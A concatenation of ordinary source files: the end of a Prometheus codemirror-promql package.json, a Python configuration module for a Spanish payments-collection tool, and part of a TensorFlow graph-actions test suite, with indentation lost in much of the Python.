"@codemirror/autocomplete": "^6.20.0",
"@codemirror/language": "^6.12.1",
"@codemirror/lint": "^6.9.3",
"@codemirror/state": "^6.5.4",
"@codemirror/view": "^6.39.12",
"@lezer/common": "^1.5.1",
"@lezer/highlight": "^1.2.3",
"@lezer/lr": "^1.4.8",
"eslint-plugin-prettier": "^5.5.5",
"isomorphic-fetch": "^3.0.0",
"nock": "^14.0.10"
},
"peerDependencies": {
"@codemirror/autocomplete": "^6.4.0",
"@codemirror/language": "^6.3.0",
"@codemirror/lint": "^6.0.0",
"@codemirror/state": "^6.1.1",
"@codemirror/view": "^6.4.0",
"@lezer/common": "^1.0.1"
},
"prettier": {
"singleQuote": true,
"trailingComma": "es5",
"printWidth": 150
},
"engines": {
"node": ">=12.0.0"
}
} | json | github | https://github.com/prometheus/prometheus | web/ui/module/codemirror-promql/package.json |
import builtins
if hasattr(builtins, "server"):
SERVER = builtins.server
else:
SERVER = False
import requests as reqs
import json
requests = reqs.session()
requests.trust_env = False
import os
import uuid
import shelve
import datetime
import getpass
from zashel.utils import search_win_drive
#STATIC Variables, not configurable
STATIC = ["USERS_FIELDS",
"USERS_UNIQUE",
"USERS_PERMISSIONS",
"PARI_FIELDS",
"PARI_UNIQUE",
"PAYMENTS_FIELDS",
"PAYMENTS_INDEX",
"MANUAL_FIELDS",
"BASE_URI",
"LOG_ERROR",
"LOG_ERROR_PARI",
"LOCAL_PATH",
"METODOS_FIELDS",
"COMMITMENTS_FIELDS",
"COMMITMENTS_INDEX"]
PATH = "PASTEL"
LOCAL_PATH = os.path.join(os.environ["LOCALAPPDATA"], "pastel")
if not os.path.exists(LOCAL_PATH):
os.makedirs(LOCAL_PATH)
LOCAL_CONFIG = os.path.join(LOCAL_PATH, "config")
if not os.path.exists(LOCAL_CONFIG):
os.makedirs(LOCAL_CONFIG)
USERS_FIELDS = ["id",
"fullname",
"role"]
USERS_UNIQUE = "id"
USERS_PERMISSIONS = ["type",
"model",
"verb",
"allowed"]
PARI_FIELDS = ["id_cliente",
"id_cuenta",
"numdoc",
"fecha_factura",
"id_factura",
"segmento",
"importe_adeudado",
"estado_recibo"]
PARI_UNIQUE = "id_factura"
PAYMENTS_FIELDS = ["fecha",
"importe",
"observaciones",
"dni",
"id_cliente",
"tels",
"oficina",
"posibles",
"estado"]
PAYMENTS_INDEX = ["fecha",
"importe",
"dni",
"id_cliente",
"oficina",
"estado"]
MANUAL_FIELDS = ["pagos_id",
"usuario",
"fecha",
"reportado"]
METODOS_FIELDS = "nombre"
COMMITMENTS_FIELDS = ["usuario",
"id_cliente",
"id_cuenta",
"id_factura",
"fecha_factura",
"importe",
"fecha",
"hora",
"canal",
"observaciones",
"estado"]
COMMITMENTS_INDEX = ["usuario",
"id_cliente",
"id_cuenta",
"id_factura",
"fecha_factura",
"importe",
"fecha",
"canal",
"estado"]
BASE_URI = "^/pastel/api/v1$"
class Path:
    """A filesystem path that, when it has no drive component, is resolved
    lazily by searching the available Windows drives (search_win_drive)."""

    def __init__(self, path):
        self._path = path

    @property
    def path(self):
        """The resolved path.

        If the stored path has no drive, try to locate it directly; on
        failure, walk up its components and re-anchor the stripped tail on
        whichever ancestor can be found on some drive.

        Raises:
            FileNotFoundError: when no ancestor can be located at all.
        """
        if os.path.splitdrive(self._path)[0] == "":
            def recursive_search(path, sub=None):
                if sub is None:
                    sub = list()
                paths = os.path.split(path)
                # BUG FIX: components must be prepended, not appended --
                # appending rebuilt the stripped tail in reverse order.
                sub.insert(0, paths[1])
                if paths[0] == "":
                    raise FileNotFoundError
                try:
                    return os.path.join(search_win_drive(paths[0]), *sub)
                except FileNotFoundError:
                    # BUG FIX: the recursive result was previously discarded,
                    # so every fallback lookup silently returned None.
                    return recursive_search(paths[0], sub)
            try:
                return search_win_drive(self._path)
            except FileNotFoundError:
                return recursive_search(self._path)
        else:
            return self._path

    @path.setter
    def path(self, value):
        self._path = value
#LOCAL defined variables
LOCAL = ["HOST", "PORT",
"PATH",
"EXPORT_PATH",
"ADMIN_DB",
"UUID",
"INIT_SERVER_STARTUP",
"ITEMS_PER_PAGE",
"USER"
]
REMOTE_PATHS = ["PATH",
"ADMIN_DB",
"EXPORT_PATH",
"DAILY_EXPORT_PATH",
"DATABASE_PATH",
"N43_PATH",
"N43_PATH_INCOMING",
"N43_PATH_OUTGOING",
"REPORT_PATH"
]
class LocalConfig: #To a dynamic access -> change API
# Per-machine settings persisted in a shelve DB under LOCAL_CONFIG.
# Only names listed in LOCAL are stored/served; values are mirrored in the
# class-level `cache` dict shared by every instance.
cache = dict()
def __setattr__(self, attr, value):
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL:
LocalConfig.cache[attr] = value
if attr == "UUID":
# A UUID is only cached in memory; the shelf records an 8-hour
# expiry timestamp instead of the value itself.
shelf["UUID-timeout"] = datetime.datetime.now() + datetime.timedelta(hours=8)
else:
shelf[attr] = value
shelf.close()
def __getattr__(self, attr):
# Invoked for every config key (normal attribute lookup always misses).
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL:
try:
data = shelf[attr]
except KeyError:
if attr == "UUID":
pass
# NOTE(review): this loop spin-waits on the shared cache and can
# spin forever if the key never appears -- confirm intent.
while True:
if attr in LocalConfig.cache:
try:
data = LocalConfig.cache[attr]
except KeyError:
continue
else:
break
else:
raise
if attr in REMOTE_PATHS:
# Path-like values are resolved through Path (drive search).
return Path(data).path
else:
if attr == "UUID":
try:
timeout = shelf["UUID-timeout"]
except KeyError:
if "UUID-timeout" in LocalConfig.cache:
timeout = LocalConfig.cache["UUID-timeout"]
else:
timeout = None
if timeout is not None and timeout < datetime.datetime.now():
# Expired: mint a fresh UUID and persist it.
data = uuid.uuid4()
shelf[attr] = data
return data
# NOTE(review): paths that return above never reach this close();
# shelve handles may be left open -- consider try/finally.
shelf.close()
def set(self, attr, value):
self.__setattr__(attr, value)
def set_default(self, attr, default):
# Write `default` only when the key is absent from the shelf.
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL and attr not in shelf:
shelf[attr] = default
shelf.close()
# NOTE(review): attr.lower() cannot match the upper-case LOCAL names,
# so this lookup appears to return None -- confirm the lowercasing.
return self.__getattr__(attr.lower())
local_config = LocalConfig()
local_config.set_default("HOST", "172.16.138.70")
local_config.set_default("PORT", 44752)
local_config.set_default("INIT_SERVER_STARTUP", True)
local_config.set_default("PATH", PATH)
local_config.set_default("EXPORT_PATH", os.path.join(PATH, "Exportaciones"))
local_config.set_default("ADMIN_DB", os.path.join(PATH, "DB", "Admin"))
local_config.set_default("ITEMS_PER_PAGE", 50)
local_config.set_default("USER", getpass.getuser())
if not os.path.exists(local_config.ADMIN_DB):
os.makedirs(local_config.ADMIN_DB)
local_config.set_default("UUID", uuid.uuid4())
LOG_ERROR = os.path.join(LOCAL_PATH, "log_error_{}".format(local_config.UUID))
LOG_ERROR_PARI = os.path.join(LOCAL_PATH, "log_error_pari_{}".format(local_config.UUID))
SHARED = ["PM_CUSTOMER",
"PM_PAYMENT_METHOD",
"PM_PAYMENT_WAY",
"DAILY_EXPORT_PATH",
"PARI_FILE_FIELDS",
"DATABASE_PATH",
"N43_PATH",
"N43_PATH_INCOMING",
"N43_PATH_OUTGOING",
"REPORT_PATH",
"PAYMENTS_STATES",
"FACTURAS",
"FACTURAS_FILE",
"PAYMENTS_UPLOADING_HEADERS",
]
BO_EVENTS = ["Aplicacion de pagos ",
"BXI",
"Excesos de pagos /Devoluciones transf.",
"Factura cero",
"Factura duplicada",
"Cambio cuenta bancaria",
"Ilocalizados",
"Localización de pagos - Carga diaria",
"MotorFax",
"Pago por plantilla",
"Reconexiones, cambio Check",
"Remedy's",
"Errores",
"Informes",
"Errores Netplus",
"Otros",
"Adelantos",
"Asnef",
"Clientes sin cuenta",
"Tablas abonos",
"Correos",
"Fuera Plazo/Dev. Factura",
"Fichero Bajas CRM",
"RRSS",
"Desbloqueos",
"Error Emisora Orange",
"Localizacion Agencia Externa",
"Error SGCD + 6 Fact",
"Fichero Pasar a impago",
"Cierre Expedientes"]
class AdminConfig: #To a dynamic access -> change API (duplicates LocalConfig -- candidate for a shared base class)
# Shared settings: served from a shelve DB when running as the server,
# otherwise fetched once from the server's /admin endpoint into `cache`.
cache = dict()
def __init__(self):
if SERVER is False:
# Client mode: prime the shared cache from the server in one GET.
AdminConfig.cache.update(json.loads(requests.get("http://{}:{}{}/admin".format(local_config.HOST,
str(local_config.PORT),
BASE_URI[1:-1])).text))
def __setattr__(self, attr, value):
# Attributes not declared in SHARED are silently dropped.
if attr in SHARED:
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
AdminConfig.cache[attr] = value
shelf[attr] = value
shelf.close()
else:
# Client mode: push the change to the server.
requests.put("http://{}:{}{}/admin/{}".format(local_config.HOST,
str(local_config.PORT),
BASE_URI[1:-1],
str(attr)),
json={attr: value})
def __getattr__(self, attr):
if attr in SHARED:
data = {}
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
try:
data = shelf[attr]
except KeyError:
if attr in AdminConfig.cache:
data = AdminConfig.cache[attr]
else:
raise
shelf.close()
else:
# Client mode reads only from the cache primed in __init__;
# the per-attribute GET below was deliberately disabled.
#data = requests.get("http://{}:{}{}/admin/{}".format(local_config.HOST,
# str(local_config.PORT),
# BASE_URI[1:-1],
# str(attr)))
#data = json.loads(data.text)
if attr in AdminConfig.cache:
data = AdminConfig.cache[attr]
else:
data = None
if attr in REMOTE_PATHS:
# Path-like values are resolved through Path (drive search).
return Path(data).path
else:
return data
else:
# Unknown attribute: empty dict rather than AttributeError.
return {}
def get(self, attr):
return self.__getattr__(attr)
def set(self, attr, value):
self.__setattr__(attr, value)
def set_default(self, attr, default):
# Only the server seeds defaults; clients read whatever exists.
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
if attr in SHARED and attr not in shelf:
self.set(attr, default)
shelf.close()
# NOTE(review): attr.lower() cannot match the upper-case SHARED names,
# so this lookup appears to return {} -- confirm the lowercasing.
return self.__getattr__(attr.lower())
admin_config = AdminConfig()
admin_config.set_default("DATABASE_PATH", os.path.join(PATH, "DB"))
admin_config.set_default("REPORT_PATH", os.path.join(PATH, "Reportes"))
admin_config.set_default("DAILY_EXPORT_PATH", os.path.join(PATH, "Exportaciones", "Diarias"))
admin_config.set_default("N43_PATH", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL"))
admin_config.set_default("N43_PATH_INCOMING", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL",
"041 ENTRADAS"))
admin_config.set_default("N43_PATH_OUTGOING", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL",
"042 SALIDAS"))
admin_config.set_default("PARI_FILE_FIELDS", ["id_cliente",
"id_cuenta",
"numdoc",
"tipodoc",
"fecha_factura",
"fecha_puesta_cobro",
"id_factura",
"segmento",
"importe_adeudado",
"metodo_pago",
"fecha_devolucion",
"importe_devolucion",
"fecha_pago",
"importe_aplicado",
"metodo_recobro",
"fecha_entrada_fichero",
"fecha_salida_fichero",
"estado_recibo",
"primera_factura"])
admin_config.set_default("PM_CUSTOMER", "DEPARTAMENTO DE COBROS")
admin_config.set_default("PM_PAYMENT_METHOD", "TRANSFERENCIA")
admin_config.set_default("PM_PAYMENT_WAY", "INTERNA")
admin_config.set_default("PAYMENTS_STATES",
["", "PENDIENTE", "APLICADO", "ILOCALIZABLE", "GRAN CUENTA", "DEUDA VENDIDA", "PAGO ORANGE"])
admin_config.set_default("FACTURAS_FILE", "codes.txt")
admin_config.set_default("PAYMENTS_UPLOADING_HEADERS", ["fecha_aplicacion",
"codigo",
"nombre",
"nif",
"id_factura",
"fecha_pago",
"importe",
"periodo_facturado",
"metodo",
"via"
])
facturas = dict()
with open(admin_config.FACTURAS_FILE, "r") as f:
for row in f:
code, date = row.split(";")
date = date.strip("\n")
facturas[datetime.datetime.strptime(date, "%d/%m/%Y")] = code
admin_config.set_default("FACTURAS", facturas)
__all__ = list()
__all__.extend(STATIC)
#__all__.extend(LOCAL)
#__all__.extend(SHARED)
__all__.extend(["local_config",
"admin_config",
"LOCAL",
"SHARED",
"get_billing_period"
])
def get_billing_period(invoice_date):  # TODO: Get this Out of here
    """Return the billing period "dd/mm/yy-dd/mm/yy" ending the day before
    *invoice_date* and starting on the same calendar day one month earlier.

    Args:
        invoice_date: a datetime.date, datetime.datetime, or a string in
            "%d/%m/%y" format.

    Raises:
        ValueError: when the period-end day does not exist in the previous
            month (e.g. an invoice dated 31 March -> 30 February).
            NOTE(review): pre-existing behaviour -- confirm whether
            clamping is wanted before changing it.
    """
    if isinstance(invoice_date, str):
        invoice_date = datetime.datetime.strptime(invoice_date, "%d/%m/%y").date()
    if isinstance(invoice_date, datetime.datetime):
        invoice_date = invoice_date.date()
    assert isinstance(invoice_date, datetime.date)
    # Day before the invoice -- idiomatic replacement for the old
    # fromordinal/(date - epoch).days round-trip, same result.
    prev_day = invoice_date - datetime.timedelta(days=1)
    # Domain quirk kept from the original: a period ending on the 7th is
    # shifted to the 8th -- presumably cycles never end on the 7th; confirm.
    if prev_day.day == 7:
        prev_day = prev_day.replace(day=8)
    # Same day number in the previous month, wrapping the year in January.
    month = prev_day.month - 1
    year = prev_day.year
    if month == 0:
        month = 12
        year -= 1
    prev_month = datetime.date(year, month, prev_day.day)
    return "{}-{}".format(prev_month.strftime("%d/%m/%y"), prev_day.strftime("%d/%m/%y"))
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph actions tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
from tensorflow.contrib import testing
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn.monitors import BaseMonitor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import saver as saver_lib
class _Feeder(object):
"""Simple generator for `feed_fn`, returning 10 * step."""
def __init__(self, tensor, max_step):
self._step = 0
self._tensor = tensor
self._max_step = max_step
@property
def step(self):
return self._step
def feed_fn(self):
if self._step >= self._max_step:
raise StopIteration
value = self._step * 10.0
self._step += 1
return {self._tensor: value}
class _BaseMonitorWrapper(BaseMonitor):
  """Base monitor wrapper to facilitate testing.

  This monitor can act as either chief-exclusive or non-exclusive.
  """

  def __init__(self, run_on_all_workers):
    super(_BaseMonitorWrapper, self).__init__()
    self._run_on_all_workers = run_on_all_workers
    # Observation flags for tests: flipped by begin()/step_begin().
    self._is_active = False
    self._has_step = False

  @property
  def run_on_all_workers(self):
    """Whether this monitor also runs on non-chief workers."""
    return self._run_on_all_workers

  @property
  def is_active(self):
    """True once begin() has been called."""
    return self._is_active

  @property
  def has_step(self):
    """True once step_begin() has been called."""
    return self._has_step

  def begin(self, max_steps=None):
    # Record activation, then defer to the wrapped base behaviour.
    self._is_active = True
    return super(_BaseMonitorWrapper, self).begin(max_steps)

  def step_begin(self, step):
    # Record that a step was seen, then defer to the base implementation.
    self._has_step = True
    return super(_BaseMonitorWrapper, self).step_begin(step)
class GraphActionsTest(test.TestCase):
"""Graph actions tests."""
def setUp(self):
learn.graph_actions.clear_summary_writers()
self._output_dir = tempfile.mkdtemp()
testing.FakeSummaryWriter.install()
def tearDown(self):
testing.FakeSummaryWriter.uninstall()
if self._output_dir:
shutil.rmtree(self._output_dir)
learn.graph_actions.clear_summary_writers()
def _assert_summaries(self,
output_dir,
writer,
expected_summaries=None,
expected_graphs=None,
expected_meta_graphs=None,
expected_session_logs=None):
self.assertTrue(isinstance(writer, testing.FakeSummaryWriter))
writer.assert_summaries(
self,
expected_logdir=output_dir,
expected_graph=ops.get_default_graph(),
expected_summaries=expected_summaries,
expected_added_graphs=expected_graphs,
expected_added_meta_graphs=expected_meta_graphs,
expected_session_logs=expected_session_logs)
# TODO(ptucker): Test number and contents of checkpoint files.
def _assert_ckpt(self, output_dir, expected=True):
ckpt_state = saver_lib.get_checkpoint_state(output_dir)
if expected:
pattern = '%s/model.ckpt-.*' % output_dir
primary_ckpt_path = ckpt_state.model_checkpoint_path
self.assertRegexpMatches(primary_ckpt_path, pattern)
all_ckpt_paths = ckpt_state.all_model_checkpoint_paths
self.assertTrue(primary_ckpt_path in all_ckpt_paths)
for ckpt_path in all_ckpt_paths:
self.assertRegexpMatches(ckpt_path, pattern)
else:
self.assertTrue(ckpt_state is None)
# TODO(ptucker): Test lock, multi-threaded access?
def test_summary_writer(self):
writer = learn.graph_actions.get_summary_writer('log/dir/0')
self._assert_summaries('log/dir/0', writer)
self.assertTrue(
learn.graph_actions.get_summary_writer('log/dir/0') is
learn.graph_actions.get_summary_writer('log/dir/0'))
self.assertTrue(
learn.graph_actions.get_summary_writer('log/dir/0') is
not learn.graph_actions.get_summary_writer('log/dir/1'))
# TODO(ptucker): Test restore_checkpoint_path for eval; this should obsolete
# test_evaluate_with_saver().
# TODO(ptucker): Test start_queue_runners for both eval & train.
# TODO(ptucker): Test coord.request_stop & coord.join for eval.
def _build_inference_graph(self):
"""Build simple inference graph.
This includes a regular variable, local variable, and fake table.
Returns:
Tuple of 3 `Tensor` objects, 2 input and 1 output.
"""
variables_lib.create_global_step()
in0 = variables.Variable(1.0)
in1 = variables_lib.local_variable(2.0)
fake_table = variables.Variable(
3.0,
trainable=False,
collections=['fake_tables'],
name='fake_table_var')
in0.graph.add_to_collections([ops.GraphKeys.TABLE_INITIALIZERS],
fake_table.initializer)
out = in0 + in1 + fake_table
return in0, in1, out
def test_infer(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, in1, out = self._build_inference_graph()
self.assertEqual({
'a': 1.0,
'b': 2.0,
'c': 6.0
}, learn.graph_actions.infer(None, {'a': in0,
'b': in1,
'c': out}))
self._assert_ckpt(self._output_dir, False)
@test.mock.patch.object(
learn.graph_actions.coordinator.Coordinator,
'request_stop',
side_effect=learn.graph_actions.coordinator.Coordinator.request_stop,
autospec=True)
def test_coordinator_request_stop_called(self, request_stop):
with ops.Graph().as_default() as g, self.test_session(g):
in0, in1, out = self._build_inference_graph()
learn.graph_actions.infer(None, {'a': in0, 'b': in1, 'c': out})
self.assertTrue(request_stop.called)
@test.mock.patch.object(
learn.graph_actions.coordinator.Coordinator,
'request_stop',
side_effect=learn.graph_actions.coordinator.Coordinator.request_stop,
autospec=True)
def test_run_feeds_iter_cleanup_with_exceptions(self, request_stop):
with ops.Graph().as_default() as g, self.test_session(g):
in0, in1, out = self._build_inference_graph()
try:
for _ in learn.graph_actions.run_feeds_iter({
'a': in0,
'b': in1,
'c': out
}, [None] * 3):
self.assertFalse(request_stop.called)
raise ValueError('Fake exception')
except ValueError:
pass
self.assertTrue(request_stop.called)
def test_run_feeds_iter_calls_resources_init(self):
with ops.Graph().as_default():
in0, _, _ = self._build_inference_graph()
handle = test_ops.stub_resource_handle_op(container='a', shared_name='b')
resources.register_resource(
handle=handle,
create_op=test_ops.resource_create_op(handle),
is_initialized_op=test_ops.resource_initialized_op(handle))
for _ in learn.graph_actions.run_feeds_iter(
{
'in0': in0
}, feed_dicts=[{}]):
self.assertTrue(test_ops.resource_initialized_op(handle).eval())
def test_infer_different_default_graph(self):
with self.test_session():
self._assert_ckpt(self._output_dir, False)
with ops.Graph().as_default():
in0, in1, out = self._build_inference_graph()
with ops.Graph().as_default():
self.assertEqual({
'a': 1.0,
'b': 2.0,
'c': 6.0
}, learn.graph_actions.infer(None, {'a': in0,
'b': in1,
'c': out}))
self._assert_ckpt(self._output_dir, False)
def test_infer_invalid_feed(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, _, _ = self._build_inference_graph()
with self.assertRaisesRegexp(TypeError, 'Can not convert a NoneType'):
learn.graph_actions.infer(None, {'a': in0}, feed_dict={None: 4.0})
self._assert_ckpt(self._output_dir, False)
def test_infer_feed(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, _, out = self._build_inference_graph()
self.assertEqual(
{
'c': 9.0
},
learn.graph_actions.infer(
None, {'c': out}, feed_dict={in0: 4.0}))
self._assert_ckpt(self._output_dir, False)
# TODO(ptucker): Test eval for 1 epoch.
def test_evaluate_invalid_args(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.evaluate(
g,
output_dir=None,
checkpoint_path=None,
eval_dict={'a': constant_op.constant(1.0)})
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.evaluate(
g,
output_dir='',
checkpoint_path=None,
eval_dict={'a': constant_op.constant(1.0)})
self._assert_ckpt(self._output_dir, False)
def test_evaluate(self):
with ops.Graph().as_default() as g, self.test_session(g):
_, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
max_steps=1)
self.assertEqual(({'a': 6.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 6.0
}},
expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
def test_evaluate_ready_for_local_init(self):
with ops.Graph().as_default() as g, self.test_session(g):
variables_lib.create_global_step()
v = variables.Variable(1.0)
variables.Variable(
v + 1, collections=[ops.GraphKeys.LOCAL_VARIABLES], trainable=False)
ready_for_local_init_op = variables.report_uninitialized_variables(
variables.global_variables())
ops.add_to_collection(ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
ready_for_local_init_op)
_ = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': v},
max_steps=1)
def test_evaluate_feed_fn(self):
with ops.Graph().as_default() as g, self.test_session(g):
in0, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
feeder = _Feeder(in0, 3)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
feed_fn=feeder.feed_fn,
max_steps=3)
self.assertEqual(3, feeder.step)
self.assertEqual(({'a': 25.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 25.0
}},
expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
def test_evaluate_feed_fn_with_exhaustion(self):
with ops.Graph().as_default() as g, self.test_session(g):
in0, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
feeder = _Feeder(in0, 2)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
feed_fn=feeder.feed_fn,
max_steps=3)
self.assertEqual(2, feeder.step)
self.assertEqual(({'a': 15.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 15.0
}},
expected_session_logs=[])
def test_evaluate_with_saver(self):
with ops.Graph().as_default() as g, self.test_session(g):
_, _, out = self._build_inference_graph()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
max_steps=1)
self.assertEqual(({'a': 6.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 6.0
}},
expected_session_logs=[])
# TODO(ptucker): Resume training from previous ckpt.
# TODO(ptucker): !supervisor_is_chief
# TODO(ptucker): Custom init op for training.
# TODO(ptucker): Mock supervisor, and assert all interactions.
# TODO(ispir): remove following tests after deprecated train.
class GraphActionsTrainTest(test.TestCase):
"""Tests for train."""
def setUp(self):
learn.graph_actions.clear_summary_writers()
self._output_dir = tempfile.mkdtemp()
testing.FakeSummaryWriter.install()
def tearDown(self):
testing.FakeSummaryWriter.uninstall()
if self._output_dir:
shutil.rmtree(self._output_dir)
learn.graph_actions.clear_summary_writers()
def _assert_summaries(self,
output_dir,
expected_summaries=None,
expected_graphs=None,
expected_meta_graphs=None,
expected_session_logs=None):
writer = learn.graph_actions.get_summary_writer(output_dir)
self.assertTrue(isinstance(writer, testing.FakeSummaryWriter))
writer.assert_summaries(
self,
expected_logdir=output_dir,
expected_graph=ops.get_default_graph(),
expected_summaries=expected_summaries,
expected_added_graphs=expected_graphs,
expected_added_meta_graphs=expected_meta_graphs,
expected_session_logs=expected_session_logs)
# TODO(ptucker): Test number and contents of checkpoint files.
def _assert_ckpt(self, output_dir, expected=True):
ckpt_state = saver_lib.get_checkpoint_state(output_dir)
if expected:
pattern = '%s/model.ckpt-.*' % output_dir
primary_ckpt_path = ckpt_state.model_checkpoint_path
self.assertRegexpMatches(primary_ckpt_path, pattern)
all_ckpt_paths = ckpt_state.all_model_checkpoint_paths
self.assertTrue(primary_ckpt_path in all_ckpt_paths)
for ckpt_path in all_ckpt_paths:
self.assertRegexpMatches(ckpt_path, pattern)
else:
self.assertTrue(ckpt_state is None)
def _build_inference_graph(self):
"""Build simple inference graph.
This includes a regular variable, local variable, and fake table.
Returns:
Tuple of 3 `Tensor` objects, 2 input and 1 output.
"""
variables_lib.create_global_step()
in0 = variables.Variable(1.0)
in1 = variables_lib.local_variable(2.0)
fake_table = variables.Variable(
3.0,
trainable=False,
collections=['fake_tables'],
name='fake_table_var')
in0.graph.add_to_collections([ops.GraphKeys.TABLE_INITIALIZERS],
fake_table.initializer)
out = in0 + in1 + fake_table
return in0, in1, out
def test_train_invalid_args(self):
with ops.Graph().as_default() as g, self.test_session(g):
train_op = constant_op.constant(1.0)
loss_op = constant_op.constant(2.0)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.train(
g, output_dir=None, train_op=train_op, loss_op=loss_op)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.train(
g,
output_dir='',
train_op=constant_op.constant(1.0),
loss_op=constant_op.constant(2.0))
with self.assertRaisesRegexp(ValueError, 'train_op'):
learn.graph_actions.train(
g, output_dir=self._output_dir, train_op=None, loss_op=loss_op)
with self.assertRaisesRegexp(ValueError, 'loss_op'):
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=constant_op.constant(1.0),
loss_op=None)
with self.assertRaisesRegexp(ValueError, 'global_step'):
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=constant_op.constant(1.0),
loss_op=loss_op)
# TODO(ptucker): Resume training from previous ckpt.
# TODO(ptucker): !supervisor_is_chief
# TODO(ptucker): Custom init op for training.
# TODO(ptucker): Mock supervisor, and assert all interactions.
def test_train(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
self._assert_summaries(self._output_dir)
self._assert_ckpt(self._output_dir, False)
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=1)
# TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
# SaverDef, so we can't add it to the summary assertion test below.
# meta_graph_def = meta_graph.create_meta_graph_def()
self.assertEqual(2.0, loss)
self._assert_summaries(self._output_dir, expected_graphs=[g])
self._assert_ckpt(self._output_dir, True)
def test_train_steps_is_incremental(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=10)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(10, step)
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=15)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(25, step)
  def test_train_max_steps_is_not_incremental(self):
    """`max_steps=N` is an absolute global-step target, not a delta.

    After the first run reaches step 10, a second run with max_steps=15
    only trains 5 additional steps, leaving the global step at 15.
    """
    with ops.Graph().as_default() as g, self.test_session(g):
      with ops.control_dependencies(self._build_inference_graph()):
